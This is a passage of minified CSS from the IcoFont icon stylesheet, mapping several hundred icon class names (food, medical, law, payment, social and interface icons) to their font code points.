tent:"\eaef"}.icofont-teacher:before{content:"\eaf0"}.icofont-test-bulb:before{content:"\eaf1"}.icofont-test-tube-alt:before{content:"\eaf2"}.icofont-university:before{content:"\eaf3"}.icofont-angry:before{content:"\eaf4"}.icofont-astonished:before{content:"\eaf5"}.icofont-confounded:before{content:"\eaf6"}.icofont-confused:before{content:"\eaf7"}.icofont-crying:before{content:"\eaf8"}.icofont-dizzy:before{content:"\eaf9"}.icofont-expressionless:before{content:"\eafa"}.icofont-heart-eyes:before{content:"\eafb"}.icofont-laughing:before{content:"\eafc"}.icofont-nerd-smile:before{content:"\eafd"}.icofont-open-mouth:before{content:"\eafe"}.icofont-rage:before{content:"\eaff"}.icofont-rolling-eyes:before{content:"\eb00"}.icofont-sad:before{content:"\eb01"}.icofont-simple-smile:before{content:"\eb02"}.icofont-slightly-smile:before{content:"\eb03"}.icofont-smirk:before{content:"\eb04"}.icofont-stuck-out-tongue:before{content:"\eb05"}.icofont-wink-smile:before{content:"\eb06"}.icofont-worried:before{content:"\eb07"}.icofont-file-alt:before{content:"\eb08"}.icofont-file-audio:before{content:"\eb09"}.icofont-file-avi-mp4:before{content:"\eb0a"}.icofont-file-bmp:before{content:"\eb0b"}.icofont-file-code:before{content:"\eb0c"}.icofont-file-css:before{content:"\eb0d"}.icofont-file-document:before{content:"\eb0e"}.icofont-file-eps:before{content:"\eb0f"}.icofont-file-excel:before{content:"\eb10"}.icofont-file-exe:before{content:"\eb11"}.icofont-file-file:before{content:"\eb12"}.icofont-file-flv:before{content:"\eb13"}.icofont-file-gif:before{content:"\eb14"}.icofont-file-html5:before{content:"\eb15"}.icofont-file-image:before{content:"\eb16"}.icofont-file-iso:before{content:"\eb17"}.icofont-file-java:before{content:"\eb18"}.icofont-file-javascript:before{content:"\eb19"}.icofont-file-jpg:before{content:"\eb1a"}.icofont-file-midi:before{content:"\eb1b"}.icofont-file-mov:before{content:"\eb1c"}.icofont-file-mp3:before{content:"\eb1d"}.icofont-file-pdf:before{content:"\eb1e"}.icofont-file-php:before{content:"\eb1f"}.icofont-file-png:before{content:"\eb20"}.icofont-file-powerpoint:before{content:"\eb21"}.icofont-file-presentation:before{content:"\eb22"}.icofont-file-psb:before{content:"\eb23"}.icofont-file-psd:before{content:"\eb24"}.icofont-file-python:before{content:"\eb25"}.icofont-file-ruby:before{content:"\eb26"}.icofont-file-spreadsheet:before{content:"\eb27"}.icofont-file-sql:before{content:"\eb28"}.icofont-file-svg:before{content:"\eb29"}.icofont-file-text:before{content:"\eb2a"}.icofont-file-tiff:before{content:"\eb2b"}.icofont-file-video:before{content:"\eb2c"}.icofont-file-wave:before{content:"\eb2d"}.icofont-file-wmv:before{content:"\eb2e"}.icofont-file-word:before{content:"\eb2f"}.icofont-file-zip:before{content:"\eb30"}.icofont-cycling-alt:before{content:"\eb31"}.icofont-cycling:before{content:"\eb32"}.icofont-dumbbell:before{content:"\eb33"}.icofont-dumbbells:before{content:"\eb34"}.icofont-gym-alt-1:before{content:"\eb35"}.icofont-gym-alt-2:before{content:"\eb36"}.icofont-gym-alt-3:before{content:"\eb37"}.icofont-gym:before{content:"\eb38"}.icofont-muscle-weight:before{content:"\eb39"}.icofont-muscle:before{content:"\eb3a"}.icofont-apple:before{content:"\eb3b"}.icofont-arabian-coffee:before{content:"\eb3c"}.icofont-artichoke:before{content:"\eb3d"}.icofont-asparagus:before{content:"\eb3e"}.icofont-avocado:before{content:"\eb3f"}.icofont-baby-food:before{content:"\eb40"}.icofont-banana:before{content:"\eb41"}.icofont-bbq:before{content:"\eb42"}.icofont-beans:before{content:"\eb43"}.icofont-beer:before{content:"\eb44"}.icofont-bell-pepper-capsicum:before{content:"\eb45"}.icofont-birthday-cake:before{content:"\eb46"}.icofont-bread:before{content:"\eb47"}.icofont-broccoli:before{content:"\eb48"}.icofont-burger:before{content:"\eb49"}.icofont-cabbage:before{content:"\eb4a"}.icofont-carrot:before{content:"\eb4b"}.icofont-cauli-flower:before{content:"\eb4c"}.icofont-cheese:before{content:"\eb4d"}.icofont-chef:before{content:"\eb4e"}.icofont-cherry:before{content:"\eb4f"}.icofont-chicken-fry:before{content:"\eb50"}.icofont-chicken:before{content:"\eb51"}.icofont-cocktail:before{content:"\eb52"}.icofont-coconut-water:before{content:"\eb53"}.icofont-coconut:before{content:"\eb54"}.icofont-coffee-alt:before{content:"\eb55"}.icofont-coffee-cup:before{content:"\eb56"}.icofont-coffee-mug:before{content:"\eb57"}.icofont-coffee-pot:before{content:"\eb58"}.icofont-cola:before{content:"\eb59"}.icofont-corn:before{content:"\eb5a"}.icofont-croissant:before{content:"\eb5b"}.icofont-crop-plant:before{content:"\eb5c"}.icofont-cucumber:before{content:"\eb5d"}.icofont-culinary:before{content:"\eb5e"}.icofont-cup-cake:before{content:"\eb5f"}.icofont-dining-table:before{content:"\eb60"}.icofont-donut:before{content:"\eb61"}.icofont-egg-plant:before{content:"\eb62"}.icofont-egg-poached:before{content:"\eb63"}.icofont-farmer-alt:before{content:"\eb64"}.icofont-farmer:before{content:"\eb65"}.icofont-fast-food:before{content:"\eb66"}.icofont-food-basket:before{content:"\eb67"}.icofont-food-cart:before{content:"\eb68"}.icofont-fork-and-knife:before{content:"\eb69"}.icofont-french-fries:before{content:"\eb6a"}.icofont-fruits:before{content:"\eb6b"}.icofont-grapes:before{content:"\eb6c"}.icofont-honey:before{content:"\eb6d"}.icofont-hot-dog:before{content:"\eb6e"}.icofont-ice-cream-alt:before{content:"\eb6f"}.icofont-ice-cream:before{content:"\eb70"}.icofont-juice:before{content:"\eb71"}.icofont-ketchup:before{content:"\eb72"}.icofont-kiwi:before{content:"\eb73"}.icofont-layered-cake:before{content:"\eb74"}.icofont-lemon-alt:before{content:"\eb75"}.icofont-lemon:before{content:"\eb76"}.icofont-lobster:before{content:"\eb77"}.icofont-mango:before{content:"\eb78"}.icofont-milk:before{content:"\eb79"}.icofont-mushroom:before{content:"\eb7a"}.icofont-noodles:before{content:"\eb7b"}.icofont-onion:before{content:"\eb7c"}.icofont-orange:before{content:"\eb7d"}.icofont-pear:before{content:"\eb7e"}.icofont-peas:before{content:"\eb7f"}.icofont-pepper:before{content:"\eb80"}.icofont-pie-alt:before{content:"\eb81"}.icofont-pie:before{content:"\eb82"}.icofont-pineapple:before{content:"\eb83"}.icofont-pizza-slice:before{content:"\eb84"}.icofont-pizza:before{content:"\eb85"}.icofont-plant:before{content:"\eb86"}.icofont-popcorn:before{content:"\eb87"}.icofont-potato:before{content:"\eb88"}.icofont-pumpkin:before{content:"\eb89"}.icofont-raddish:before{content:"\eb8a"}.icofont-restaurant-menu:before{content:"\eb8b"}.icofont-restaurant:before{content:"\eb8c"}.icofont-salt-and-pepper:before{content:"\eb8d"}.icofont-sandwich:before{content:"\eb8e"}.icofont-sausage:before{content:"\eb8f"}.icofont-soft-drinks:before{content:"\eb90"}.icofont-soup-bowl:before{content:"\eb91"}.icofont-spoon-and-fork:before{content:"\eb92"}.icofont-steak:before{content:"\eb93"}.icofont-strawberry:before{content:"\eb94"}.icofont-sub-sandwich:before{content:"\eb95"}.icofont-sushi:before{content:"\eb96"}.icofont-taco:before{content:"\eb97"}.icofont-tea-pot:before{content:"\eb98"}.icofont-tea:before{content:"\eb99"}.icofont-tomato:before{content:"\eb9a"}.icofont-watermelon:before{content:"\eb9b"}.icofont-wheat:before{content:"\eb9c"}.icofont-baby-backpack:before{content:"\eb9d"}.icofont-baby-cloth:before{content:"\eb9e"}.icofont-baby-milk-bottle:before{content:"\eb9f"}.icofont-baby-trolley:before{content:"\eba0"}.icofont-baby:before{content:"\eba1"}.icofont-candy:before{content:"\eba2"}.icofont-holding-hands:before{content:"\eba3"}.icofont-infant-nipple:before{content:"\eba4"}.icofont-kids-scooter:before{content:"\eba5"}.icofont-safety-pin:before{content:"\eba6"}.icofont-teddy-bear:before{content:"\eba7"}.icofont-toy-ball:before{content:"\eba8"}.icofont-toy-cat:before{content:"\eba9"}.icofont-toy-duck:before{content:"\ebaa"}.icofont-toy-elephant:before{content:"\ebab"}.icofont-toy-hand:before{content:"\ebac"}.icofont-toy-horse:before{content:"\ebad"}.icofont-toy-lattu:before{content:"\ebae"}.icofont-toy-train:before{content:"\ebaf"}.icofont-burglar:before{content:"\ebb0"}.icofont-cannon-firing:before{content:"\ebb1"}.icofont-cc-camera:before{content:"\ebb2"}.icofont-cop-badge:before{content:"\ebb3"}.icofont-cop:before{content:"\ebb4"}.icofont-court-hammer:before{content:"\ebb5"}.icofont-court:before{content:"\ebb6"}.icofont-finger-print:before{content:"\ebb7"}.icofont-gavel:before{content:"\ebb8"}.icofont-handcuff-alt:before{content:"\ebb9"}.icofont-handcuff:before{content:"\ebba"}.icofont-investigation:before{content:"\ebbb"}.icofont-investigator:before{content:"\ebbc"}.icofont-jail:before{content:"\ebbd"}.icofont-judge:before{content:"\ebbe"}.icofont-law-alt-1:before{content:"\ebbf"}.icofont-law-alt-2:before{content:"\ebc0"}.icofont-law-alt-3:before{content:"\ebc1"}.icofont-law-book:before{content:"\ebc2"}.icofont-law-document:before{content:"\ebc3"}.icofont-law-order:before{content:"\ebc4"}.icofont-law-protect:before{content:"\ebc5"}.icofont-law-scales:before{content:"\ebc6"}.icofont-law:before{content:"\ebc7"}.icofont-lawyer-alt-1:before{content:"\ebc8"}.icofont-lawyer-alt-2:before{content:"\ebc9"}.icofont-lawyer:before{content:"\ebca"}.icofont-legal:before{content:"\ebcb"}.icofont-pistol:before{content:"\ebcc"}.icofont-police-badge:before{content:"\ebcd"}.icofont-police-cap:before{content:"\ebce"}.icofont-police-car-alt-1:before{content:"\ebcf"}.icofont-police-car-alt-2:before{content:"\ebd0"}.icofont-police-car:before{content:"\ebd1"}.icofont-police-hat:before{content:"\ebd2"}.icofont-police-van:before{content:"\ebd3"}.icofont-police:before{content:"\ebd4"}.icofont-thief-alt:before{content:"\ebd5"}.icofont-thief:before{content:"\ebd6"}.icofont-abacus-alt:before{content:"\ebd7"}.icofont-abacus:before{content:"\ebd8"}.icofont-angle-180:before{content:"\ebd9"}.icofont-angle-45:before{content:"\ebda"}.icofont-angle-90:before{content:"\ebdb"}.icofont-angle:before{content:"\ebdc"}.icofont-calculator-alt-1:before{content:"\ebdd"}.icofont-calculator-alt-2:before{content:"\ebde"}.icofont-calculator:before{content:"\ebdf"}.icofont-circle-ruler-alt:before{content:"\ebe0"}.icofont-circle-ruler:before{content:"\ebe1"}.icofont-compass-alt-1:before{content:"\ebe2"}.icofont-compass-alt-2:before{content:"\ebe3"}.icofont-compass-alt-3:before{content:"\ebe4"}.icofont-compass-alt-4:before{content:"\ebe5"}.icofont-golden-ratio:before{content:"\ebe6"}.icofont-marker-alt-1:before{content:"\ebe7"}.icofont-marker-alt-2:before{content:"\ebe8"}.icofont-marker-alt-3:before{content:"\ebe9"}.icofont-marker:before{content:"\ebea"}.icofont-math:before{content:"\ebeb"}.icofont-mathematical-alt-1:before{content:"\ebec"}.icofont-mathematical-alt-2:before{content:"\ebed"}.icofont-mathematical:before{content:"\ebee"}.icofont-pen-alt-1:before{content:"\ebef"}.icofont-pen-alt-2:before{content:"\ebf0"}.icofont-pen-alt-3:before{content:"\ebf1"}.icofont-pen-holder-alt-1:before{content:"\ebf2"}.icofont-pen-holder:before{content:"\ebf3"}.icofont-pen:before{content:"\ebf4"}.icofont-pencil-alt-1:before{content:"\ebf5"}.icofont-pencil-alt-2:before{content:"\ebf6"}.icofont-pencil-alt-3:before{content:"\ebf7"}.icofont-pencil-alt-4:before{content:"\ebf8"}.icofont-pencil:before{content:"\ebf9"}.icofont-ruler-alt-1:before{content:"\ebfa"}.icofont-ruler-alt-2:before{content:"\ebfb"}.icofont-ruler-compass-alt:before{content:"\ebfc"}.icofont-ruler-compass:before{content:"\ebfd"}.icofont-ruler-pencil-alt-1:before{content:"\ebfe"}.icofont-ruler-pencil-alt-2:before{content:"\ebff"}.icofont-ruler-pencil:before{content:"\ec00"}.icofont-ruler:before{content:"\ec01"}.icofont-rulers-alt:before{content:"\ec02"}.icofont-rulers:before{content:"\ec03"}.icofont-square-root:before{content:"\ec04"}.icofont-ui-calculator:before{content:"\ec05"}.icofont-aids:before{content:"\ec06"}.icofont-ambulance-crescent:before{content:"\ec07"}.icofont-ambulance-cross:before{content:"\ec08"}.icofont-ambulance:before{content:"\ec09"}.icofont-autism:before{content:"\ec0a"}.icofont-bandage:before{content:"\ec0b"}.icofont-blind:before{content:"\ec0c"}.icofont-blood-drop:before{content:"\ec0d"}.icofont-blood-test:before{content:"\ec0e"}.icofont-blood:before{content:"\ec0f"}.icofont-brain-alt:before{content:"\ec10"}.icofont-brain:before{content:"\ec11"}.icofont-capsule:before{content:"\ec12"}.icofont-crutch:before{content:"\ec13"}.icofont-disabled:before{content:"\ec14"}.icofont-dna-alt-1:before{content:"\ec15"}.icofont-dna-alt-2:before{content:"\ec16"}.icofont-dna:before{content:"\ec17"}.icofont-doctor-alt:before{content:"\ec18"}.icofont-doctor:before{content:"\ec19"}.icofont-drug-pack:before{content:"\ec1a"}.icofont-drug:before{content:"\ec1b"}.icofont-first-aid-alt:before{content:"\ec1c"}.icofont-first-aid:before{content:"\ec1d"}.icofont-heart-beat-alt:before{content:"\ec1e"}.icofont-heart-beat:before{content:"\ec1f"}.icofont-heartbeat:before{content:"\ec20"}.icofont-herbal:before{content:"\ec21"}.icofont-hospital:before{content:"\ec22"}.icofont-icu:before{content:"\ec23"}.icofont-injection-syringe:before{content:"\ec24"}.icofont-laboratory:before{content:"\ec25"}.icofont-medical-sign-alt:before{content:"\ec26"}.icofont-medical-sign:before{content:"\ec27"}.icofont-nurse-alt:before{content:"\ec28"}.icofont-nurse:before{content:"\ec29"}.icofont-nursing-home:before{content:"\ec2a"}.icofont-operation-theater:before{content:"\ec2b"}.icofont-paralysis-disability:before{content:"\ec2c"}.icofont-patient-bed:before{content:"\ec2d"}.icofont-patient-file:before{content:"\ec2e"}.icofont-pills:before{content:"\ec2f"}.icofont-prescription:before{content:"\ec30"}.icofont-pulse:before{content:"\ec31"}.icofont-stethoscope-alt:before{content:"\ec32"}.icofont-stethoscope:before{content:"\ec33"}.icofont-stretcher:before{content:"\ec34"}.icofont-surgeon-alt:before{content:"\ec35"}.icofont-surgeon:before{content:"\ec36"}.icofont-tablets:before{content:"\ec37"}.icofont-test-bottle:before{content:"\ec38"}.icofont-test-tube:before{content:"\ec39"}.icofont-thermometer-alt:before{content:"\ec3a"}.icofont-thermometer:before{content:"\ec3b"}.icofont-tooth:before{content:"\ec3c"}.icofont-xray:before{content:"\ec3d"}.icofont-ui-add:before{content:"\ec3e"}.icofont-ui-alarm:before{content:"\ec3f"}.icofont-ui-battery:before{content:"\ec40"}.icofont-ui-block:before{content:"\ec41"}.icofont-ui-bluetooth:before{content:"\ec42"}.icofont-ui-brightness:before{content:"\ec43"}.icofont-ui-browser:before{content:"\ec44"}.icofont-ui-calendar:before{content:"\ec45"}.icofont-ui-call:before{content:"\ec46"}.icofont-ui-camera:before{content:"\ec47"}.icofont-ui-cart:before{content:"\ec48"}.icofont-ui-cell-phone:before{content:"\ec49"}.icofont-ui-chat:before{content:"\ec4a"}.icofont-ui-check:before{content:"\ec4b"}.icofont-ui-clip-board:before{content:"\ec4c"}.icofont-ui-clip:before{content:"\ec4d"}.icofont-ui-clock:before{content:"\ec4e"}.icofont-ui-close:before{content:"\ec4f"}.icofont-ui-contact-list:before{content:"\ec50"}.icofont-ui-copy:before{content:"\ec51"}.icofont-ui-cut:before{content:"\ec52"}.icofont-ui-delete:before{content:"\ec53"}.icofont-ui-dial-phone:before{content:"\ec54"}.icofont-ui-edit:before{content:"\ec55"}.icofont-ui-email:before{content:"\ec56"}.icofont-ui-file:before{content:"\ec57"}.icofont-ui-fire-wall:before{content:"\ec58"}.icofont-ui-flash-light:before{content:"\ec59"}.icofont-ui-flight:before{content:"\ec5a"}.icofont-ui-folder:before{content:"\ec5b"}.icofont-ui-game:before{content:"\ec5c"}.icofont-ui-handicapped:before{content:"\ec5d"}.icofont-ui-home:before{content:"\ec5e"}.icofont-ui-image:before{content:"\ec5f"}.icofont-ui-laoding:before{content:"\ec60"}.icofont-ui-lock:before{content:"\ec61"}.icofont-ui-love-add:before{content:"\ec62"}.icofont-ui-love-broken:before{content:"\ec63"}.icofont-ui-love-remove:before{content:"\ec64"}.icofont-ui-love:before{content:"\ec65"}.icofont-ui-map:before{content:"\ec66"}.icofont-ui-message:before{content:"\ec67"}.icofont-ui-messaging:before{content:"\ec68"}.icofont-ui-movie:before{content:"\ec69"}.icofont-ui-music-player:before{content:"\ec6a"}.icofont-ui-music:before{content:"\ec6b"}.icofont-ui-mute:before{content:"\ec6c"}.icofont-ui-network:before{content:"\ec6d"}.icofont-ui-next:before{content:"\ec6e"}.icofont-ui-note:before{content:"\ec6f"}.icofont-ui-office:before{content:"\ec70"}.icofont-ui-password:before{content:"\ec71"}.icofont-ui-pause:before{content:"\ec72"}.icofont-ui-play-stop:before{content:"\ec73"}.icofont-ui-play:before{content:"\ec74"}.icofont-ui-pointer:before{content:"\ec75"}.icofont-ui-power:before{content:"\ec76"}.icofont-ui-press:before{content:"\ec77"}.icofont-ui-previous:before{content:"\ec78"}.icofont-ui-rate-add:before{content:"\ec79"}.icofont-ui-rate-blank:before{content:"\ec7a"}.icofont-ui-rate-remove:before{content:"\ec7b"}.icofont-ui-rating:before{content:"\ec7c"}.icofont-ui-record:before{content:"\ec7d"}.icofont-ui-remove:before{content:"\ec7e"}.icofont-ui-reply:before{content:"\ec7f"}.icofont-ui-rotation:before{content:"\ec80"}.icofont-ui-rss:before{content:"\ec81"}.icofont-ui-search:before{content:"\ec82"}.icofont-ui-settings:before{content:"\ec83"}.icofont-ui-social-link:before{content:"\ec84"}.icofont-ui-tag:before{content:"\ec85"}.icofont-ui-text-chat:before{content:"\ec86"}.icofont-ui-text-loading:before{content:"\ec87"}.icofont-ui-theme:before{content:"\ec88"}.icofont-ui-timer:before{content:"\ec89"}.icofont-ui-touch-phone:before{content:"\ec8a"}.icofont-ui-travel:before{content:"\ec8b"}.icofont-ui-unlock:before{content:"\ec8c"}.icofont-ui-user-group:before{content:"\ec8d"}.icofont-ui-user:before{content:"\ec8e"}.icofont-ui-v-card:before{content:"\ec8f"}.icofont-ui-video-chat:before{content:"\ec90"}.icofont-ui-video-message:before{content:"\ec91"}.icofont-ui-video-play:before{content:"\ec92"}.icofont-ui-video:before{content:"\ec93"}.icofont-ui-volume:before{content:"\ec94"}.icofont-ui-weather:before{content:"\ec95"}.icofont-ui-wifi:before{content:"\ec96"}.icofont-ui-zoom-in:before{content:"\ec97"}.icofont-ui-zoom-out:before{content:"\ec98"}.icofont-cassette-player:before{content:"\ec99"}.icofont-cassette:before{content:"\ec9a"}.icofont-forward:before{content:"\ec9b"}.icofont-guiter:before{content:"\ec9c"}.icofont-movie:before{content:"\ec9d"}.icofont-multimedia:before{content:"\ec9e"}.icofont-music-alt:before{content:"\ec9f"}.icofont-music-disk:before{content:"\eca0"}.icofont-music-note:before{content:"\eca1"}.icofont-music-notes:before{content:"\eca2"}.icofont-music:before{content:"\eca3"}.icofont-mute-volume:before{content:"\eca4"}.icofont-pause:before{content:"\eca5"}.icofont-play-alt-1:before{content:"\eca6"}.icofont-play-alt-2:before{content:"\eca7"}.icofont-play-alt-3:before{content:"\eca8"}.icofont-play-pause:before{content:"\eca9"}.icofont-play:before{content:"\ecaa"}.icofont-record:before{content:"\ecab"}.icofont-retro-music-disk:before{content:"\ecac"}.icofont-rewind:before{content:"\ecad"}.icofont-song-notes:before{content:"\ecae"}.icofont-sound-wave-alt:before{content:"\ecaf"}.icofont-sound-wave:before{content:"\ecb0"}.icofont-stop:before{content:"\ecb1"}.icofont-video-alt:before{content:"\ecb2"}.icofont-video-cam:before{content:"\ecb3"}.icofont-video-clapper:before{content:"\ecb4"}.icofont-video:before{content:"\ecb5"}.icofont-volume-bar:before{content:"\ecb6"}.icofont-volume-down:before{content:"\ecb7"}.icofont-volume-mute:before{content:"\ecb8"}.icofont-volume-off:before{content:"\ecb9"}.icofont-volume-up:before{content:"\ecba"}.icofont-youtube-play:before{content:"\ecbb"}.icofont-2checkout-alt:before{content:"\ecbc"}.icofont-2checkout:before{content:"\ecbd"}.icofont-amazon-alt:before{content:"\ecbe"}.icofont-amazon:before{content:"\ecbf"}.icofont-american-express-alt:before{content:"\ecc0"}.icofont-american-express:before{content:"\ecc1"}.icofont-apple-pay-alt:before{content:"\ecc2"}.icofont-apple-pay:before{content:"\ecc3"}.icofont-bank-transfer-alt:before{content:"\ecc4"}.icofont-bank-transfer:before{content:"\ecc5"}.icofont-braintree-alt:before{content:"\ecc6"}.icofont-braintree:before{content:"\ecc7"}.icofont-cash-on-delivery-alt:before{content:"\ecc8"}.icofont-cash-on-delivery:before{content:"\ecc9"}.icofont-diners-club-alt-1:before{content:"\ecca"}.icofont-diners-club-alt-2:before{content:"\eccb"}.icofont-diners-club-alt-3:before{content:"\eccc"}.icofont-diners-club:before{content:"\eccd"}.icofont-discover-alt:before{content:"\ecce"}.icofont-discover:before{content:"\eccf"}.icofont-eway-alt:before{content:"\ecd0"}.icofont-eway:before{content:"\ecd1"}.icofont-google-wallet-alt-1:before{content:"\ecd2"}.icofont-google-wallet-alt-2:before{content:"\ecd3"}.icofont-google-wallet-alt-3:before{content:"\ecd4"}.icofont-google-wallet:before{content:"\ecd5"}.icofont-jcb-alt:before{content:"\ecd6"}.icofont-jcb:before{content:"\ecd7"}.icofont-maestro-alt:before{content:"\ecd8"}.icofont-maestro:before{content:"\ecd9"}.icofont-mastercard-alt:before{content:"\ecda"}.icofont-mastercard:before{content:"\ecdb"}.icofont-payoneer-alt:before{content:"\ecdc"}.icofont-payoneer:before{content:"\ecdd"}.icofont-paypal-alt:before{content:"\ecde"}.icofont-paypal:before{content:"\ecdf"}.icofont-sage-alt:before{content:"\ece0"}.icofont-sage:before{content:"\ece1"}.icofont-skrill-alt:before{content:"\ece2"}.icofont-skrill:before{content:"\ece3"}.icofont-stripe-alt:before{content:"\ece4"}.icofont-stripe:before{content:"\ece5"}.icofont-visa-alt:before{content:"\ece6"}.icofont-visa-electron:before{content:"\ece7"}.icofont-visa:before{content:"\ece8"}.icofont-western-union-alt:before{content:"\ece9"}.icofont-western-union:before{content:"\ecea"}.icofont-boy:before{content:"\eceb"}.icofont-business-man-alt-1:before{content:"\ecec"}.icofont-business-man-alt-2:before{content:"\eced"}.icofont-business-man-alt-3:before{content:"\ecee"}.icofont-business-man:before{content:"\ecef"}.icofont-female:before{content:"\ecf0"}.icofont-funky-man:before{content:"\ecf1"}.icofont-girl-alt:before{content:"\ecf2"}.icofont-girl:before{content:"\ecf3"}.icofont-group:before{content:"\ecf4"}.icofont-hotel-boy-alt:before{content:"\ecf5"}.icofont-hotel-boy:before{content:"\ecf6"}.icofont-kid:before{content:"\ecf7"}.icofont-man-in-glasses:before{content:"\ecf8"}.icofont-people:before{content:"\ecf9"}.icofont-support:before{content:"\ecfa"}.icofont-user-alt-1:before{content:"\ecfb"}.icofont-user-alt-2:before{content:"\ecfc"}.icofont-user-alt-3:before{content:"\ecfd"}.icofont-user-alt-4:before{content:"\ecfe"}.icofont-user-alt-5:before{content:"\ecff"}.icofont-user-alt-6:before{content:"\ed00"}.icofont-user-alt-7:before{content:"\ed01"}.icofont-user-female:before{content:"\ed02"}.icofont-user-male:before{content:"\ed03"}.icofont-user-suited:before{content:"\ed04"}.icofont-user:before{content:"\ed05"}.icofont-users-alt-1:before{content:"\ed06"}.icofont-users-alt-2:before{content:"\ed07"}.icofont-users-alt-3:before{content:"\ed08"}.icofont-users-alt-4:before{content:"\ed09"}.icofont-users-alt-5:before{content:"\ed0a"}.icofont-users-alt-6:before{content:"\ed0b"}.icofont-users-social:before{content:"\ed0c"}.icofont-users:before{content:"\ed0d"}.icofont-waiter-alt:before{content:"\ed0e"}.icofont-waiter:before{content:"\ed0f"}.icofont-woman-in-glasses:before{content:"\ed10"}.icofont-search-1:before{content:"\ed11"}.icofont-search-2:before{content:"\ed12"}.icofont-search-document:before{content:"\ed13"}.icofont-search-folder:before{content:"\ed14"}.icofont-search-job:before{content:"\ed15"}.icofont-search-map:before{content:"\ed16"}.icofont-search-property:before{content:"\ed17"}.icofont-search-restaurant:before{content:"\ed18"}.icofont-search-stock:before{content:"\ed19"}.icofont-search-user:before{content:"\ed1a"}.icofont-search:before{content:"\ed1b"}.icofont-500px:before{content:"\ed1c"}.icofont-aim:before{content:"\ed1d"}.icofont-badoo:before{content:"\ed1e"}.icofont-baidu-tieba:before{content:"\ed1f"}.icofont-bbm-messenger:before{content:"\ed20"}.icofont-bebo:before{content:"\ed21"}.icofont-behance:before{content:"\ed22"}.icofont-blogger:before{content:"\ed23"}.icofont-bootstrap:before{content:"\ed24"}.icofont-brightkite:before{content:"\ed25"}.icofont-cloudapp:before{content:"\ed26"}.icofont-concrete5:before{content:"\ed27"}.icofont-delicious:before{content:"\ed28"}.icofont-designbump:before{content:"\ed29"}.icofont-designfloat:before{content:"\ed2a"}.icofont-deviantart:before{content:"\ed2b"}.icofont-digg:before{content:"\ed2c"}.icofont-dotcms:before{content:"\ed2d"}.icofont-dribbble:before{content:"\ed2e"}.icofont-dribble:before{content:"\ed2f"}.icofont-dropbox:before{content:"\ed30"}.icofont-ebuddy:before{content:"\ed31"}.icofont-ello:before{content:"\ed32"}.icofont-ember:before{content:"\ed33"}.icofont-envato:before{content:"\ed34"}.icofont-evernote:before{content:"\ed35"}.icofont-facebook-messenger:before{content:"\ed36"}.icofont-facebook:before{content:"\ed37"}.icofont-feedburner:before{content:"\ed38"}.icofont-flikr:before{content:"\ed39"}.icofont-folkd:before{content:"\ed3a"}.icofont-foursquare:before{content:"\ed3b"}.icofont-friendfeed:before{content:"\ed3c"}.icofont-ghost:before{content:"\ed3d"}.icofont-github:before{content:"\ed3e"}.icofont-gnome:before{content:"\ed3f"}.icofont-google-buzz:before{content:"\ed40"}.icofont-google-hangouts:before{content:"\ed41"}.icofont-google-map:before{content:"\ed42"}.icofont-google-plus:before{content:"\ed43"}.icofont-google-talk:before{content:"\ed44"}.icofont-hype-machine:before{content:"\ed45"}.icofont-instagram:before{content:"\ed46"}.icofont-kakaotalk:before{content:"\ed47"}.icofont-kickstarter:before{content:"\ed48"}.icofont-kik:before{content:"\ed49"}.icofont-kiwibox:before{content:"\ed4a"}.icofont-line-messenger:before{content:"\ed4b"}.icofont-line:before{content:"\ed4c"}.icofont-linkedin:before{content:"\ed4d"}.icofont-linux-mint:before{content:"\ed4e"}.icofont-live-messenger:before{content:"\ed4f"}.icofont-livejournal:before{content:"\ed50"}.icofont-magento:before{content:"\ed51"}.icofont-meetme:before{content:"\ed52"}.icofont-meetup:before{content:"\ed53"}.icofont-mixx:before{content:"\ed54"}.icofont-newsvine:before{content:"\ed55"}.icofont-nimbuss:before{content:"\ed56"}.icofont-odnoklassniki:before{content:"\ed57"}.icofont-opencart:before{content:"\ed58"}.icofont-oscommerce:before{content:"\ed59"}.icofont-pandora:before{content:"\ed5a"}.icofont-photobucket:before{content:"\ed5b"}.icofont-picasa:before{content:"\ed5c"}.icofont-pinterest:before{content:"\ed5d"}.icofont-prestashop:before{content:"\ed5e"}.icofont-qik:before{content:"\ed5f"}.icofont-qq:before{content:"\ed60"}.icofont-readernaut:before{content:"\ed61"}.icofont-reddit:before{content:"\ed62"}.icofont-renren:before{content:"\ed63"}.icofont-rss:before{content:"\ed64"}.icofont-shopify:before{content:"\ed65"}.icofont-silverstripe:before{content:"\ed66"}.icofont-skype:before{content:"\ed67"}.icofont-slack:before{content:"\ed68"}.icofont-slashdot:before{content:"\ed69"}.icofont-slidshare:before{content:"\ed6a"}.icofont-smugmug:before{content:"\ed6b"}.icofont-snapchat:before{content:"\ed6c"}.icofont-soundcloud:before{content:"\ed6d"}.icofont-spotify:before{content:"\ed6e"}.icofont-stack-exchange:before{content:"\ed6f"}.icofont-stack-overflow:before{content:"\ed70"}.icofont-steam:before{content:"\ed71"}.icofont-stumbleupon:before{content:"\ed72"}.icofont-tagged:before{content:"\ed73"}.icofont-technorati:before{content:"\ed74"}.icofont-telegram:before{content:"\ed75"}.icofont-tinder:before{content:"\ed76"}.icofont-trello:before{content:"\ed77"}.icofont-tumblr:before{content:"\ed78"}.icofont-twitch:before{content:"\ed79"}.icofont-twitter:before{content:"\ed7a"}.icofont-typo3:before{content:"\ed7b"}.icofont-ubercart:before{content:"\ed7c"}.icofont-viber:before{content:"\ed7d"}.icofont-viddler:before{content:"\ed7e"}.icofont-vimeo:before{content:"\ed7f"}.icofont-vine:before{content:"\ed80"}.icofont-virb:before{content:"\ed81"}.icofont-virtuemart:before{content:"\ed82"}.icofont-vk:before{content:"\ed83"}.icofont-wechat:before{content:"\ed84"}.icofont-weibo:before{content:"\ed85"}.icofont-whatsapp:before{content:"\ed86"}.icofont-xing:before{content:"\ed87"}.icofont-yahoo:before{content:"\ed88"}.icofont-yelp:before{content:"\ed89"}.icofont-youku:before{content:"\ed8a"}.icofont-youtube:before{content:"\ed8b"}.icofont-zencart:before{content:"\ed8c"}.icofont-badminton-birdie:before{content:"\ed8d"}.icofont-baseball:before{content:"\ed8e"}.icofont-baseballer:before{content:"\ed8f"}.icofont-basketball-hoop:before{content:"\ed90"}.icofont-basketball:before{content:"\ed91"}.icofont-billiard-ball:before{content:"\ed92"}.icofont-boot-alt-1:before{content:"\ed93"}.icofont-boot-alt-2:before{content:"\ed94"}.icofont-boot:before{content:"\ed95"}.icofont-bowling-alt:before{content:"\ed96"}.icofont-bowling:before{content:"\ed97"}.icofont-canoe:before{content:"\ed98"}.icofont-cheer-leader:before{content:"\ed99"}.icofont-climbing